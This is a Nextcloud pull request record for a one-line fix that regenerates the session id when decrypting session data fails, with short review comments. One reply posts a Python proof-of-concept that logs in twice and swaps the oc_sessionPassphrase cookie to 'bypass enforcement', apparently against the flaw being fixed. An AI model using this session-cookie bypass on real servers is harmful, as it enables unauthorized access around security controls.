### PR TITLE
Generate a new session id if the decrypting the session data fails

### PR DESCRIPTION
**Pull request by rullzer**
Signed-off-by: Roeland Jago Douma <roeland@famdouma.nl>

### CODE REVIEW

File: lib/private/Session/CryptoSessionData.php [hunk 1]
```diff
@@ -87,6 +87,7 @@ protected function initializeSession() {
 			);
 		} catch (\Exception $e) {
 			$this->sessionValues = [];
+			$this->regenerateId(true, false);
```
Comment (nickvergessen) [inline lib/private/Session/CryptoSessionData.php:90]: Those are the default values, so skip?

**Review by nickvergessen — APPROVED** [review]

File: lib/private/Session/CryptoSessionData.php (hunk 1 above)
Comment (rullzer) [reply lib/private/Session/CryptoSessionData.php:90]: I'd rather be explicit here

**Review by MorrisJobke — APPROVED** [review]

File: lib/private/Session/CryptoSessionData.php (hunk 1 above)
Comment (jalaldeen786) [reply lib/private/Session/CryptoSessionData.php:90]: #!/usr/bin/python3
# python3 -m pip install requests beautifulsoup4
# python3 bypass.py
from requests import Session
from bs4 import BeautifulSoup

class NextCloud(object):
    def __init__(self, baseURL):
        self.session = Session()
        self.baseURL = baseURL

    def login(self, data):
        response = self.session.get(f'{self.baseURL}/login')
        soup = BeautifulSoup(response.text, 'html.parser')
        data.update({
            'requesttoken': soup.find('head')['data-requesttoken']
        })
        self.session.post(f'{self.baseURL}/login', data = data)
    
    def getCookies(self):
        return self.session.cookies.get_dict()

if __name__ == '__main__':
    baseURL = 'http://nextcloud.diefunction.local'
    data = {
        'user': 'bypass',
        'password': 'NextCloudEnforcement'
    }
    firstSession = NextCloud(baseURL)
    secondSession = NextCloud(baseURL)
    firstSession.login(data)
    secondSession.login(data)
    cookies = firstSession.getCookies()
    cookies['oc_sessionPassphrase'] = secondSession.getCookies()['oc_sessionPassphrase']
    print(f'[Cookies] {cookies}') # change your browser cookies to bypass enforcement

**Pull request merged**